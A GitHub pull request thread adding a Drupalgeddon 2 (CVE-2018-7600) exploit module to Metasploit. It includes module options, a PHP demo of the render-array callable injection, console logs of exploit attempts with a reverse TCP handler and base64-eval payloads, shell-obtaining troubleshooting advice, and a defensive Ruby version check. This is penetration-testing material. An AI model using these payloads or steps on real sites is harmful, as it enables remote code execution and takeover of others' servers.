
Add Drupal Drupalgeddon 2 #9876

Merged
merged 26 commits into from
Apr 25, 2018

Conversation

@wvu wvu commented Apr 13, 2018

msf5 exploit(unix/webapp/drupal_drupalgeddon2) > info

       Name: Drupal Drupalgeddon 2 Forms API Property Injection
     Module: exploit/unix/webapp/drupal_drupalgeddon2
   Platform: PHP, Unix, Linux
       Arch: php, cmd, x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2018-03-28

Provided by:
  Jasper Mattsson
  a2u
  Nixawk
  FireFart
  wvu <wvu@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic (PHP In-Memory)
  1   Automatic (PHP Dropper)
  2   Automatic (Unix In-Memory)
  3   Automatic (Linux Dropper)
  4   Drupal 7.x (PHP In-Memory)
  5   Drupal 7.x (PHP Dropper)
  6   Drupal 7.x (Unix In-Memory)
  7   Drupal 7.x (Linux Dropper)
  8   Drupal 8.x (PHP In-Memory)
  9   Drupal 8.x (PHP Dropper)
  10  Drupal 8.x (Unix In-Memory)
  11  Drupal 8.x (Linux Dropper)

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  DUMP_OUTPUT  false            no        If output should be dumped
  PHP_FUNC     passthru         yes       PHP function to execute
  Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                         yes       The target address
  RPORT        80               yes       The target port (TCP)
  SSL          false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI    /                yes       Path to Drupal install
  VHOST                         no        HTTP server virtual host

Payload information:
  Avoid: 3 characters

Description:
  This module exploits a Drupal property injection in the Forms API.
  Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are
  vulnerable.

References:
  https://cvedetails.com/cve/CVE-2018-7600/
  https://www.drupal.org/sa-core-2018-002
  https://greysec.net/showthread.php?tid=2912
  https://research.checkpoint.com/uncovering-drupalgeddon-2/
  https://github.com/a2u/CVE-2018-7600
  https://github.com/nixawk/labs/issues/19
  https://github.com/FireFart/CVE-2018-7600
  Also known as: SA-CORE-2018-002
  Also known as: Drupalgeddon 2

msf5 exploit(unix/webapp/drupal_drupalgeddon2) >

Resolves #9789.

@wvu wvu added the module, hotness, blocked and feature labels Apr 13, 2018
@wvu wvu force-pushed the feature/drupal branch 11 times, most recently from 3897d04 to 50f8058 on April 14, 2018 00:25
@wvu wvu added the needs-docs label Apr 14, 2018
@wvu wvu force-pushed the feature/drupal branch 11 times, most recently from bced7e2 to 6838a4e on April 14, 2018 05:13
nixawk commented Apr 14, 2018

A PHP demo is prepared for exploit tests. It shows how to exploit CVE-2018-7600.

root@lab:~# php /tmp/bug.php passthru id
PHP Warning:  Parameter 2 to passthru() expected to be a reference, value given in /tmp/bug.php on line 38
PHP Stack trace:
PHP   1. {main}() /tmp/bug.php:0
PHP   2. drupal_cve_2018_7600() /tmp/bug.php:45
uid=0(root) gid=0(root) groups=0(root)


root@lab:~# php /tmp/bug.php printf drupal
drupal6

<?php

// Author: Nixawk
// CVE-2018-7600: Unsanitized requests allow remote attackers to execute arbitrary code

// Usage:
// $ php drupal-rce-php.php passthru id

function drupal_cve_2018_7600($func, $param)
{
    // A render array shaped like the one Drupal's Forms API builds from request input.
    $elements = array(
        "#markup" => "{Drupal\Core\Render\Markup}",
        "#type"   => "markup",
        "#post_render" => array(
            0 => $func
        ),
        "#suffix" => "<span class=\"ajax-new-content\"></span>",
        "#prefix" => "",
        "#cache"  => array(
            "contexts" => array(
                0 => "languages:language_intreface",
                1 => "theme",
                2 => "user.permissions"
            ),
            "tags" => array(),
            "max-age" => -1
        ),
        "#defaults_loaded" => true,
        "#attached" => array(),
        "#children" => array(
            "string" => $param
        )
    );

    // echo $elements['#children']["string"] . "\n";

    // Mimics the renderer: each #post_render callable is applied to #children,
    // so a caller-controlled callable runs with a caller-controlled argument.
    $elements['#children']["string"] = call_user_func(
        // $callable = $elements["#post_render"]["0"];
        $elements["#post_render"]["0"],
        $elements['#children']["string"],
        $elements
    );

    echo $elements['#children']["string"] . "\n";
}

drupal_cve_2018_7600($argv[1], $argv[2]);

?>

@alfonsocaponi

msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set TARGETURI /drupal
TARGETURI => /drupal
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > check

[-] Could not determine Drupal version to target
[*] 192.168.253.129:80 Cannot reliably check exploitability.
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set TARGETURI /drupal/
TARGETURI => /drupal/
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > check

[*] Drupal 7.x targeted at http://192.168.253.129/drupal/
[+] Drupal appears unpatched in CHANGELOG.txt
[+] 192.168.253.129:80 The target is vulnerable.

bcoles commented Apr 26, 2018

@alfonsocaponi that makes sense. At a guess, /drupal is returning a 302 redirect to /drupal/.

check does not follow redirects.
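
Added example (my code, not the module's or the project's), in Ruby since the module is Ruby: a defender-side check of the kind discussed above that follows the /drupal -> /drupal/ redirect, reads the release line of CHANGELOG.txt (assumed Drupal 7 layout), takes a mention of SA-CORE-2018-002 as the patched marker (an assumption), and applies the vulnerable ranges from the module description, returning a plain boolean.

```ruby
require 'net/http'
require 'uri'

ADVISORY = 'SA-CORE-2018-002'

# Vulnerable ranges as listed in the module description: Drupal 6.x, < 7.58,
# 8.2.x, < 8.3.9, < 8.4.6, < 8.5.1. Always returns true or false.
def drupal_vulnerable?(version)
  major, minor, patch = version.split('.').map(&:to_i)
  return true if major == 6
  return minor.to_i < 58 if major == 7
  return false unless major == 8
  minor, patch = minor.to_i, patch.to_i
  return true if minor <= 2 # everything below 8.3.9, including 8.2.x
  { 3 => 9, 4 => 6, 5 => 1 }.fetch(minor, 0) > patch
end

# Reads the release line of CHANGELOG.txt ("Drupal 7.57, 2018-02-21", assumed
# Drupal 7 layout). A mention of the advisory ID is taken as the patched marker
# (assumption); otherwise the parsed version decides.
def changelog_unpatched?(body)
  return false if body.include?(ADVISORY)
  m = body.match(/^Drupal (\d+\.\d+(?:\.\d+)?)/)
  return false unless m
  drupal_vulnerable?(m[1])
end

# GET a URL, following up to +limit+ redirects (e.g. /drupal -> /drupal/),
# which is the case the check above tripped over. Returns nil on failure.
def fetch(url, limit = 3)
  return nil if limit.zero?
  res = Net::HTTP.get_response(URI(url))
  return res.body if res.is_a?(Net::HTTPSuccess)
  return nil unless res.is_a?(Net::HTTPRedirection) && res['location']
  fetch(URI.join(url, res['location']).to_s, limit - 1)
end

# Constructed sample in the Drupal 7 layout (not a real changelog).
SAMPLE_CHANGELOG = <<~TXT
  Drupal 7.57, 2018-02-21
  -----------------------
  - Fixed security issues (multiple vulnerabilities). See SA-CORE-2018-001.
TXT

# Usage against a live install (base URL must end with '/'):
#   body = fetch('http://host/drupal/CHANGELOG.txt')
#   puts changelog_unpatched?(body.to_s) ? 'appears unpatched' : 'patched or unknown'
```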

@alfonsocaponi

@bcoles in your opinion, could it be useful to add an option about redirects? :)

msjenkins-r7 pushed a commit that referenced this pull request Apr 26, 2018
wvu commented Apr 26, 2018

@alfonsocaponi: Happy to make the change.

wvu commented Apr 26, 2018

Hmm, it'll be more complicated than that. Reactively writing in send_request_cgi! is not a practice I want to perpetuate. I'm investigating a better way.

wvu added a commit to wvu/metasploit-framework that referenced this pull request May 3, 2018
Thanks to a reviewer for noticing my drupal_unpatched? method was
tri-state because of an unrefactored return. Oops! :)
wvu commented May 3, 2018

Bah, it's catching my rebases. It's always a mistake to reference a PR in a commit. :/

wvu commented May 3, 2018

@alfonsocaponi: See if the latest code works for you. Thanks.

wvu commented May 3, 2018

All right, I've committed what I hope to be my final revision to the module. Happy hunting. Bug reports welcome.

@user124567

Hi - I have been trying to exploit a Raspbian/LAMP/Drupal8.5.0 install without success - any ideas why? Below is the output - thanks for any help!

[*] Started reverse TCP handler on 192.168.152.128:4444
[*] Drupal 8 targeted at http://192.168.1.104/drupal/
[+] Drupal appears unpatched in CHANGELOG.txt
[*] Executing with printf(): 8237hWucIsyWIFYCWi8sDn9eRbsTlaOK2r
[*] Executing with assert(): eval(base64_decode(...));
[*] Executing with passthru(): php -r 'eval(base64_decode(...));'
[*] Exploit completed, but no session was created.
msf exploit(unix/webapp/drupal_drupalgeddon2) > check

[*] Drupal 8 targeted at http://192.168.1.104/drupal/
[+] Drupal appears unpatched in CHANGELOG.txt
[*] Executing with printf(): 8sU6NkT0h7ZMtNZa6cbk1P1EARQFWROBfg0W6re
[+] 192.168.1.104:80 The target is vulnerable.

wvu commented Jun 3, 2018

@user124567: Are you sure your payload settings are correct? The payload can connect back? Also, it's possible there's no PHP CLI, or perhaps passthru() was disabled (you can change the PHP_FUNC option). Clearly assert() did not work. I suggest giving cmd/unix/generic a try and seeing if you can get shell output.

@user124567

Thanks for taking the time to reply. I have checked that the PHP CLI is installed and passthru is enabled. cmd/unix/generic doesn't run (not a compatible payload), but I tried all the available options without success as well, also with php_func = exec.

I have the exploit running well against an Intel CPU install we have, but not the Raspberry Pi install. Again, grateful for any suggestions, thanks.

wvu commented Jun 4, 2018

If cmd/unix/generic is not a compatible payload, your target is wrong. Select a Unix In-Memory target. Btw, if you have a bug, don't comment on the PR: create a new issue. If you require support, please ask us on IRC or via e-mail (msfdev@metasploit.com works).

wvu commented Jun 4, 2018

Happy to wrap up debugging this with you here, though. :)

wvu commented Jun 4, 2018

Next thing I would suggest is using strace to verify command injection is possible. I'd give your php.ini a once-over, too.

Successfully merging this pull request may close these issues: CVE-2018-7600 (Drupalgedon2)